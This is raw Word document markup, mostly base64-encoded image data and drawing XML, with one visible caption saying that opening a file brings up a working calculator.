QpVPZ1Jn0j/alp/wA/MP8A38FH9qWn/PzD/wB/BXk3m+bH5iVL&#10;XMdR6p/alp/z8w/9/BR/alp/z8w/9/BXzLq37QXw50G8ubTUfGGm2tzbySRyRySf6uStLwB8XvBn&#10;xQuNRg8KeIbHXJLHy/tcdlJ5nkeZ/q6APoj+1LT/AJ+Yf+/go/tS0/5+Yf8Av4K8rooA9U/tS0/5&#10;+Yf+/go/tS0/5+Yf+/gryuigD1T+1LT/AJ+Yf+/go/tS0/5+Yf8Av4K8rooA9U/tS0/5+Yf+/go/&#10;tS0/5+Yf+/gryuigD1T+1LT/AJ+Yf+/go/tS0/5+Yf8Av4K8rooA9U/tS0/5+Yf+/go/tS0/5+Yf&#10;+/gryuigD1T+1LT/AJ+Yf+/go/tS0/5+Yf8Av4K8rooA9U/tS0/5+Yf+/go/tS0/5+Yf+/gryuig&#10;D1T+1LT/AJ+Yf+/go/tS0/5+Yf8Av4K8rooA9U/tS0/5+Yf+/go/tS0/5+Yf+/gryuigD1T+1LT/&#10;AJ+Yf+/go/tS0/5+Yf8Av4K8rooA9U/tS0/5+Yf+/go/tS0/5+Yf+/gryuigD1T+1LT/AJ+Yf+/g&#10;o/tS0/5+Yf8Av4K8rooA9U/tS0/5+Yf+/go/tS0/5+Yf+/gryuigD1T+1LT/AJ+Yf+/go/tS0/5+&#10;Yf8Av4K8rqGgD1r+1LT/AJ+Yf+/go/tS0/5+Yf8Av4K8rrnP+Fg+GotUvdNfXbGK9sP+Pi2kuPL8&#10;v/Vyf+3Ef/fygD3f+1LT/n5h/wC/go/tS0/5+Yf+/grxXTfFGi6pceRZatY31z/zztriOSSo9W8W&#10;6boOoW9hdST/AG27jkuI47a3kk/dx+XHJ/q/+ukf/fygD27+1LT/AJ+Yf+/go/tS0/5+Yf8Av4K8&#10;D/4WFpP/AE9f+AEn/wAbqzpvjLTdU1SOwg8+K5kjkkjjktJI/wDV/wCs/wDRlAHuf9qWn/PzD/38&#10;FH9qWn/PzD/38FeTXV1BY28k888dtbR/6ySSTy446r22s2F/H5lrfwXMfl+Z5kcnmfu6APYf7UtP&#10;+fmH/v4KP7UtP+fmH/v4K8ek1SwivI7R7uCO9k/eR23mfvJKu0Aeqf2paf8APzD/AN/BR/alp/z8&#10;w/8AfwV5N/y08uiOVJY/MSTzY6APWf7UtP8An5h/7+Cj+1LT/n5h/wC/gryaO6jl8vZJH+8/1f8A&#10;00qWgD1T+1LT/n5h/wC/go/tS0/5+Yf+/gr5V/aP/aB039m/wBF4r1TSbrV7aS/jsvs1l5fmeZJ5&#10;n/PT/rnXgeof8FKINNs3ur34NeOrGzhXe9xdWnlRx++emKAP0m/tS0/5+Yf+/go/tS0/5+Yf+/gr&#10;wD4X+O4Pid8PPDvi+ytJ7G31q0jvI7a4/wBZH5ldXQB6oNYsW6XcP/fYorxmz/5Bth/17p/KigDS&#10;r8KYxd6D4d8W/wBqfCax0fZbxfJdW+qR7v8ASI/+elxX7rUUAfnh/wAEm9ds9YvfikbTw/p2iKke&#10;l7/7Oe4k383P/PxJJX6H1l2mjaXpF9NdWdhbW1zff625htkSSb/fx1rUoA4/4kap/wASv+wrWCS+&#10;1rVv9Ht7aP8A5Z/9PEn/ADzjjo1vRta8XWdtYajBY2Nl9ot7i4ktruS4kk8uTzPL/wBXH/y0jrqP&#10;skEcr3XkR+dKvkPNs+fZzx/4+asUAFcN8Y4o5fA8kk/keVHqen3HlyRySeZ5eoW8nl+XHHJJ+8/1&#10;f+r/AOWldzRQB5RomvabrPizw5HB4a/siSO7kk+0yaRqFv8A8u9x+78ySzjj/wDIlb3whsILDwne&#10;x2sflR/23rH/AKcbiOu5ooA4/wCK3/Ir2X/Ya0f/ANOFvUfwc/5I/wCB/wDsA6f/AOk8ddHq2i2m&#10;vWcVpex+bGk0F1/wOJ0mT/x+JD+FM8P6TZ+HdBsNKskkjsdOhS1hj39Eii2JQB5NpNh4lv4/DEdr&#10;pOpaR9g0i3067kkjjjk/4+LPzPLk/wCeflx3FUrnR/G+l+PL2/SDVf7OktPsUdzY+XJc+ZHcXn2e&#10;STzP9ZHHHJH/AOQ/+mle9VDQBz3gC6v7rw3HJqOm3WmXPmSf6NfXElxJ/wBdP3ldPRRQAUUUUAFF&#10;FFABRRRQAUVDU1AGL4t/5BVt/wBf9n/6UR1i/Bf/AJI/4H/7AOn/APpPHXV3lhHqKiKblEkik/74&#10;l3iq/h/RbTw7odhpVjH5djp0KWsMfokUWxBQBo186/DK38M/FLWvE/gnXdSstK0bSvEuqXmpaTLP&#10;HA+uu9zJ9nk6h/Lj2fjiP0r6KrCn8I+HNRkmurrQtOuJm/1s01mju9cNej7T2Zw4rDe35DzvwT4n&#10;0mP4pW/w/wBOuIdY/wCEU0m8jg1RHjk/0SSWz+zweZ/z0T7n/bOvYaybDQ9G0OZzYaVZWM0v7t5L&#10;W2RK0K1ow9nA0wtGUIOEzjPjRpepax8K/EVppHmf2jJB5kfl/wDLTy5PMkj/AO/dfIHwz+KHhTS9&#10;MvdC1tH0PXo7vzI9Skt5JI5I/wDnn+7/AOWlfeVZ/wDZOk/bv7W/s61+3/8APz9mTzf+++tfR4TM&#10;qcMDUwM4fGeBmWS08fiPbv8Ak5Ct4Ji8rwnpP7yT95B5n7yPy5P3n7z/AFdb9FFeDGnCnDkgfSYe&#10;nCjT9nA+dPjJrGm6D8VPt17oWj65/okfmW2rWEdx5kf/AG0qHwr4r8H+JviFoUmj+ENB8PyJcR+X&#10;FZWMEcn/AH8jjr6Ror7COZ0nh+V4f3+Tl+I+JlktWeJnP6z7nPz/AAhWB8SP3fw/8T/9gy4/9FyV&#10;v15/4s+MHh/w/qU2l39pf3TtETLtiRo3V+owZK+fwUm8RTcYH2tarTow5qkuWHkfJ/w4+LXh/wAK&#10;6fo9jBqNzbx2P+lvJ9n8zz76T939o8v/AJ528f8Aq6+j/wBnHxFH4qtfF2qRyPJFdatJJ5kn/LSs&#10;r/hanwy/6E//AMplv/8AHK09P+PngnQYZVsNGv7GF/8Alna2cCf+1K/Qs3zShmOHqQw9CUJz63iz&#10;59/U/rcK9Nr7mex1znj/AFmTQfDdzqUFpHfSW8f7uOt+8uEsbeWd9+I0kdhGcZry3/ho7w3/AM+O&#10;qf8AfiL/AOOV+W18vePj7KceaHunuzzCngVfmcZ+Rq+G/FGuy+JLbTdUsLWKO4tPtkcll5n/AD0j&#10;r0GvLIf2iPDU1xFGLDVQ0jxxqfLj4/8AIld5pXiK31ebyYY5oxs3/vCDWGEyOWW+0mocn9f4pF/2&#10;nSxfue0cvka9fCHxI8I+KPDnh+5tdR8JyRfaNakuINSjsI5JJI/+efmR/vK+76hr38uzN4GfwDnD&#10;2h4p8AdL8Uf8JR4j1LVI54tJu7e3+z+Z+78ySvcaKK58djFjK/t+QdOHszz740eF9S8ZeE49N0iw&#10;gudRkuI/Lubm4kt/sn/TxXz3q2iy/DXUtZ0bxDo/9peIdSf7RB4n3ySeZH/zz/ef9c69yuv2iPD1&#10;rcTxm01VmhfywfLj/wDjlQv+0F4VvPJ83TNRm2yeZF5kEfyf+RK+hy7G4jBfu5U1KHqfDZrg8BmU&#10;51VWcZ+jPQ/CX/Ip6Lv/AOfC3/8ARda1eb6B8ctA8RavFpsFrqUM0n3fMiQxj8PMrrPF3iq28HWF&#10;vdXkUswd9m23Cj+Zr5yvSqe25ZxXPM+rwuLorC80JPkgeS654+s/g98TvE2patpV7czam9pJa3tt&#10;Ajx/Z4/9ZbgvVvwT4iX4p/FCw8WaVa3VjbWOlfY9SuLiBIPt9x/2z/z+7rQuP2gvCeo2fl3Wlahc&#10;Qf8APOaCN/5yUiftEeFrOGIRadqkMKf8s44Y/wD45X1UsZbC/wAD3+Xl576bW+Ex+uUufdfcz1yu&#10;L+L2g3/iP4b61YaX/wAfskf7uP8A56fvP9XWz4Y8TW/irSzf2sU0ULvs/wBIIMn5ituviq1H7FQ9&#10;D3cVStT0jM+SfhTrMl/4s06Cxv76xjsLT7PcaJ5cnl/6vy5P+mf+sr6o0eOSPS7ffxJ5dS/YLfzZ&#10;bryY/Of/AJbbPnqzXjwjPHY6GKlVT9nHkjaPL7pth1VwuGnQrT56k583MdF4b/5B8n/XSvmP9ri1&#10;v9G+Inh3xC/2qLSY7CS3jvbaP/j0uP3n7z/yJH/37r1jWvjvoPw9uI7DULTUrmZ088/ZIkWPPHYy&#10;f7FY0/7Vngu8s3il0nWZoJfvxyW8HP8A5Er6D6tWk4VIRR4+KxsUp0YV3CfkmeIfBX4qeID4r8O6&#10;ZLfR67Yyav8AY4/9Z9o8uT/lp+8/5Z19kat/x8Sf9cK8ftP2lPh9p90klr4bvraeJfJV4bG3TC+n&#10;ElbGmfHzQfGGqSQWlpqUDeXs3XESH+UldeKpQq1Z4qjQUJyXv6/FI4ctxbpQeGr4hzt8OjNjxJay&#10;XXh/UYII/NkktJI44/8AtnX59fHDxtofhfwzp3he68Bf8I143tI9PkkvY7eP9/H/AMtJP3f/AD0k&#10;j/8ARlfbXi74xaN4Ov47W8gv5y8Hn7reJBz+MlYv/DSHhv8A58NV/wC/cf8A8cr1cqxVXAQVRUlL&#10;5lY6phMTLkqVHGfoea/sI+KJPFHhvxXI/mfu7uP/ANF19Q1wmifGPRNet5J7e31CII+zbJCh/wDa&#10;ldp9sT7H5/z42eZtzXmZjXqYzFTruPLznp4FUKNDkpycjxn9ojwlqfiTVPB89r4Xk8VadafbI7+3&#10;j8vzPLkjjj8yPzP+Wn/xuvk34U6Dq3xk+JniPSdBsE02y/eXEn2mOS3jtP3n+r/1f+sr7I/4aQ8N&#10;/wDPhqv/AH7j/wDjlH/DSHhv/nw1X/v3H/8AHK97BZji8Jh/YQpr7zwcV/Z2Lqe0nN/cenWMX2Wz&#10;to3/AOWcfl1ZrgvCXxi0bxhfyWtnBfwlIPP3XEKHnn0k/wButLxj8QNN8FQRPdwXU5keRF+zpGMf&#10;nXydSlUdbl5ffPo6eLoex+s8z5D8k/jlb/G/Wvip4ut7Dwj4mk0WDV9QjtIrbQZHjkj+0yfP/qvn&#10;/wBZ196+mf8Aglz4R8V+G9R+Jt14q8P6j4fe7Gn+X9tsJLPf5f2j/V/u6+p/+GkPDf8Az4ar/wB+&#10;4/8A45R/w0h4b/58NV/79x//ABytvqOJ7IX17D919zPV6KzPDevW3ifSItStI5ooZPM2/aCDIP3m&#10;zqK06wlD2c+SZ1wlCpDngFFFFZGgUUUUAFFQ1NQAUUUUAFFFFABRRRQAUVDU1ABRRRQAUUUUAFFF&#10;FABRUNTUAFFFFABRRRQAVx+peA/+Eo1S5u9eu55Y45P+JZbW1xJH9k/6afu/+Wn+s/ef9s/+enmd&#10;hRQBm+H4tTtdHtoNXnjub2P93Jcx/wDLx/00/wCmdfJ/7X3wb+KXiy6ubT4cXRsrW/CXE96PMjlj&#10;l8z5445LePzOsccn7z/npX2FRQB8wfsr/D/xl4K8G+FND8WxX154hsNTvL2/1q6SSWOe3kjuI44/&#10;tEn7z/WSR/8AfuvWfH/mReONFn+3/wBmR/2JqlvHfSSRxxxyfaNP8v8AeSRyR/8ALOT/AJZ/8s69&#10;GooA81k1mD/VprWjyx+XHH5kmp2//wAj1Joksd14807yNSj1f93qEnmRyRyfZ45JLfy4/wB3HH/n&#10;/lpJXo1FAHH/ABe0u71j4Z+I7DToJLm9nt/3cccfmSSV5b4k8B+KNU+067okE8V7b+HfsX2a5gjt&#10;/t8cklx5lv5cf+rk/eRyR/8ATSOOvoKigDx/TdG1rS/FllH/AGLJc3Mmp/aLjVpLSOSP7H5f7uPz&#10;P9ZHJH/q69gqGpqAOP8A+ESj/wCFgXureRJ5d/pn2e4uftEn/PT/AFf/AEz/AO2dcX4X+H3iGw+F&#10;+g6FZRx6RJb2/wBnuPNv5I5I7f7R5kkccccckf7yP/lp/rK9kooA8k8P+A7+11T4UXc2m/ZrnRdI&#10;ksrvy7jzI7f/AEeOPy69boooA+Zf+ChXwx8UfF34DW2heEdFn1zVU1q3nNtbSRx/u0ik/wCelfmT&#10;Z/CXxn8VNa1PQPA/w51iLUdKaSHVYL5LSSW3f+4ZPs0HluMPx1r90KbDYxLNO0Uccc0v+tk2ffoA&#10;8z/Zr8L6l4N+AHgPQtatJLHVbDSbe3u7aX/lnJ5denUUUAZtn/yDbD/r3T+VFMsv+QXYf9e6fyoo&#10;A//ZUEsDBBQABgAIAAAAIQDGDbd43AAAAAUBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI9BS8NAEIXv&#10;gv9hGcGb3cRgiTGbUop6KoKtIN6myTQJzc6G7DZJ/72jF708GN7w3vfy1Ww7NdLgW8cG4kUEirh0&#10;Vcu1gY/9y10KygfkCjvHZOBCHlbF9VWOWeUmfqdxF2olIewzNNCE0Gda+7Ihi37hemLxjm6wGOQc&#10;al0NOEm47fR9FC21xZalocGeNg2Vp93ZGnidcFon8fO4PR03l6/9w9vnNiZjbm/m9ROoQHP4e4Yf&#10;fEGHQpgO7syVV50BGRJ+VbzHJJUZBwPLOE1AF7n+T198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ycOfVeAQAAHERAAAOAAAAAAAAAAAAAAAAAD0CAABkcnMvZTJv&#10;RG9jLnhtbFBLAQItAAoAAAAAAAAAIQAlYMm3J2cAACdnAAAUAAAAAAAAAAAAAAAAAOEGAABkcnMv&#10;bWVkaWEvaW1hZ2UxLmpwZ1BLAQItABQABgAIAAAAIQDGDbd43AAAAAUBAAAPAAAAAAAAAAAAAAAA&#10;ADpuAABkcnMvZG93bnJldi54bWxQSwECLQAUAAYACAAAACEAN53BGLoAAAAhAQAAGQAAAAAAAAAA&#10;AAAAAABDbwAAZHJzL19yZWxzL2Uyb0RvYy54bWwucmVsc1BLBQYAAAAABgAGAHwBAAA0cAAAAAA=&#10;">
                <v:rect id="Rectangle 5176" o:spid="_x0000_s1312" style="position:absolute;left:4315;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14:paraId="3A571C34" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 5177" o:spid="_x0000_s1313" style="position:absolute;left:59192;top:34098;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02AFD784" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 5178" o:spid="_x0000_s1314" style="position:absolute;left:4315;top:35744;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201EDE51" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:b/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 5179" o:spid="_x0000_s1315" style="position:absolute;left:4315;top:37771;width:4243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4A1DD8EE" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve">On opening the </w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>file</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> we get a working calculator</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 5180" o:spid="_x0000_s1316" style="position:absolute;left:36234;top:37771;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14:paraId="125C1A75" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Picture 5183" o:spid="_x0000_s1317" type="#_x0000_t75" style="position:absolute;left:127;top:186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xGyAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9PawIx&#10;FMTvQr9DeIXeNKvWxW6N0gpSTwXtH+jtsXnNLm5elk3cbPvpTUHocZiZ3zCrzWAb0VPna8cKppMM&#10;BHHpdM1GwfvbbrwE4QOyxsYxKfghD5v1zWiFhXaRD9QfgxEJwr5ABVUIbSGlLyuy6CeuJU7et+ss&#10;hiQ7I3WHMcFtI2dZlkuLNaeFClvaVlSejmer4Df2s1Oem+3rw/3Xc4zy5cN8zpW6ux2eHkEEGsJ/&#10;+NreawWL6XIOf2/SE5DrCwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUB&#10;AAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCTBLxGyAAAAN0A&#10;AAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/AIAAAAA&#10;">
                  <v:imagedata r:id="rId104" o:title=""/>
                </v:shape>
                <v:shape id="Shape 5184" o:spid="_x0000_s1318" style="position:absolute;top:1740;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5PxxAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pi8Iw&#10;FMTvwn6H8Ba8aVpXpVSjLOsqHv2zsHh7NM+22LyUJtr67Y0geBxm5jfMfNmZStyocaVlBfEwAkGc&#10;WV1yruDvuB4kIJxH1lhZJgV3crBcfPTmmGrb8p5uB5+LAGGXooLC+zqV0mUFGXRDWxMH72wbgz7I&#10;Jpe6wTbATSVHUTSVBksOCwXW9FNQdjlcjYLfdvTvT7vNJYnPVtfjfMVfu6NS/c/uewbCU+ff4Vd7&#10;qxVM4mQMzzfhCcjFAwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhACDLk/HEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m,3329305r5899150,l5899150,,,,,3329305xe" filled="f" strokeweight="2pt">
                  <v:path arrowok="t" textboxrect="0,0,5899150,3329305"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="607B7ABB" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI" w:eastAsia="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C203D88" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00F97B52">
      <w:pPr>
        <w:sectPr w:rsidR="00F97B52">
          <w:headerReference w:type="even" r:id="rId105"/>
          <w:headerReference w:type="default" r:id="rId106"/>
          <w:footerReference w:type="even" r:id="rId107"/>
          <w:footerReference w:type="default" r:id="rId108"/>
          <w:headerReference w:type="first" r:id="rId109"/>
          <w:footerReference w:type="first" r:id="rId110"/>
          <w:pgSz w:w="11911" w:h="16841"/>
          <w:pgMar w:top="539" w:right="1921" w:bottom="536" w:left="1340" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BE5964B" w14:textId="77777777" w:rsidR="00F97B52" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="84"/>
        <w:ind w:left="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="046BC6C9" wp14:editId="35B5C4B1">
                <wp:extent cx="5960974" cy="3550180"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="43545" name="Group 43545"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5960974" cy="3550180"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5960974" cy="3550180"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="5260" name="Rectangle 5260"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="5919216" y="3236388"/>
                            <a:ext cx="55538" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="41A045C9"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5261" name="Rectangle 5261"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="431546" y="3400980"/>
                            <a:ext cx="55538" cy="198436"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="30F37C7D"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5294" name="Picture 5294"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId111"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="12700" y="12700"/>
                            <a:ext cx="5873750" cy="3303905"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="5295" name="Shape 5295"/>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6BC6C9" id="Group 43545" o:spid="_x0000_s1319" style="width:469.35pt;height:279.55pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="59609,35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Lx7SCAQAAPILAAAOAAAAZHJzL2Uyb0RvYy54bWzMVm1v2zYQ/j5g&#10;/0HQ98aSZTmWEKcYmjUoMKxB2/0AmqYsYRRJkHTs7Nfv7kjKbpIuRQZ0CxCZL8fjcw/v7ertcZTZ&#10;vbBu0GqdlxdFngnF9XZQu3X+x5f3b1Z55jxTWya1Euv8Qbj87fXPP10dTCvmutdyK2wGSpRrD2ad&#10;996bdjZzvBcjcxfaCAWbnbYj8zC1u9nWsgNoH+VsXhTL2UHbrbGaC+dg9SZs5tekv+sE9x+7zgmf&#10;yXUO2Dx9LX03+J1dX7F2Z5npBx5hsFegGNmg4NJJ1Q3zLNvb4YmqceBWO935C67Hme66gQuyAawp&#10;i0fW3Fq9N2TLrj3szEQTUPuIp1er5b/f31rz2dxZYOJgdsAFzdCWY2dH/AWU2ZEoe5goE0efcVis&#10;m2XRXC7yjMNeVddFuYqk8h6Yf3KO97++cHKWLp59BedgwEHciQP37zj43DMjiFrXAgd3Nhu2YM18&#10;CU6i2Aie+gl8h6mdFBmtEj0kO5HlWge8PcNU3ZTNvFzmGXIyr5bVahUcbWKtrisIDOSsbFaLaonb&#10;k+GsNdb5W6HHDAfr3AIU8i52/5vzQTSJ4PVS4Vfp94OUYRdXgL+EEEf+uDmSkeWiwutwbaO3D2B6&#10;r+1fHyGIO6kP61zHUY5xDbfjbp7JDwooxxBKA5sGmzSwXr7TFGgBzy97r7uBAJ9ui8DgLQOGH/Go&#10;5bOPWiYawAFeftRFVdaL+KaLomiSn/9P3nSRjPmv39QMvIX/mKxg9CRQX07qcMrvrcijkvG7dIzM&#10;/rk3byCvGuaHzSAH/0A1AkIHQan7u4FjvOLkPOYbSF8h5kEA74WIhzWIkSSJ5zCwcP6Vmo0cDEYd&#10;+juOI2AoMI8S9DM2h+R/o/l+FMqHamaFBOxauX4wLs9sK8aNgMRkP2zJW1nrvBWe93hhBxdjlgoh&#10;P20QyhMwxPyNPFXOLwuIaMxCNAJFrJ38eXVZXdawTZm9KqqmqJGT16YpghWA0BBw/bAE0NTphSnv&#10;4/uSLZiVviv4A0uxsp0YapryxNC8qZ4wxPchkSOxKXlDk7ANaRzW+jTiR5WGmO7/sV8B/8ZzqBSH&#10;GSTtehWx9FByqgAF90fI5l80SfpTMU4S4TlPMlKdy046sYxFneFEkku/hnSfyxNV4CpJIv0GyTM6&#10;z2S41E6EC9AscrXJVJA7J1MqtHpeQyYGD2XQOXYQOVQkoWlS24QzVpvgd/jczj9IgXxI9Ul0UBCh&#10;iSnpnLO7zTtps3uGJYz+or+TKJ4JERdPFd88haJMmp5FXVFNvIDsippQUlCbOoGJanlEE3pV6PjA&#10;ztSxAhfTIYKllZ/OK+iz6cIza0/VF3nBGZVf6rCgsSREsQnGzvV8TvKnVv36bwAAAP//AwBQSwME&#10;CgAAAAAAAAAhAG+ahO7UhQAA1IUAABQAAABkcnMvbWVkaWEvaW1hZ2UxLmpwZ//Y/+AAEEpGSUYA&#10;AQEBAGAAYAAA/9sAQwADAgIDAgIDAwMDBAMDBAUIBQUEBAUKBwcGCAwKDAwLCgsLDQ4SEA0OEQ4L&#10;CxAWEBETFBUVFQwPFxgWFBgSFBUU/9sAQwEDBAQFBAUJBQUJFA0LDRQUFBQUFBQUFBQUFBQUFBQU&#10;FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU/8AAEQgCHgP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Pt/tt9bwno75r0yzt&#10;o7G1SKNPLRBXm/hz/kN2f+/XpjtsVm9K7sV8Z89lUPcnUJfMT+8KfXwtqHjG5+ONpqWhaRql1H8T&#10;/tU9xFFdPcRpb28fW3tzGfLSTp+8r6F/Zn8TeI9d+Htxb+KpPtGt6TfS6fcXHmeZ5nl99/euE+hP&#10;Yt4p1eJap4q1T/hKvGcieI5reTSbyzjsdJ/dGOcvbxyeX/q/M/eF6uR/HNZJNKEejxqurQfaLaT7&#10;d/qx58cX+kfu/wB3/rO2+gD2GivG/EnxwXwuL2KbTY5Ly0vJLPy47r/WeXpf9oGSP939zH7upv8A&#10;hc01q2oi/wBC8oWBljlFvdfaJN8dnHeY/wBX/wA85B/wMYoA9epu8V4nefHZ7eG5mHh2Vbe1s/tc&#10;k0kkkB8vzI4/3ccsUbn/AFnfZ/q67j4a69feItHv59R+yi4t9Xv7RDbvkeXHcSRx/oKAO2ooooAK&#10;KKKACiiigAooooAKKKKACiivCP2i/iJ4g+G0ehan4cP9t3nmzp/whcUAe51j5AfMjk++gg/1h9if&#10;9igD3BgG4Fed+J7GPTNT2Q/6uSPzPLqz8HNZuvEvw60bWL/UINSvb9HuJ7i2t5LeMO7/AOrEcnzj&#10;y/8AV/vPn/d1J45/5Cdv/uV1YX+IePmkIewOXopl9LPa6fcz2sEl9cxx+ZHbRyeX5kn/ADzrw7Sf&#10;iX4zl+LmrQP4I1WWP+yLf/iW/wBp2f8Ao/7yT95/rK9s+Vpw9oe6UUUUEBRRRQAUUUUAFFFFABRR&#10;RQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAskUcsckbx+bHJ/rK53/hWfhP/AKF6x/7910NFHtJ0&#10;zGdOFT+Ic7/wrTwv/wBAKx/74o/4Vp4X/wCgFY/98V0VFae3n/OZ/VaH/Ps53/hWnhf/AKAVj/3x&#10;WtoujWHheOSPSLSOxjuJPMk8v/lpVyijnnUNadOFP+GTfap/+eklH2qf/npJUNFc/szp9tU/nJvt&#10;U/8Az0ko+1T/APPSSoaKPZh7ap/OTfap/wDnpJR9qn/56SVDRR7MPbVP5yb7VP8A89JKP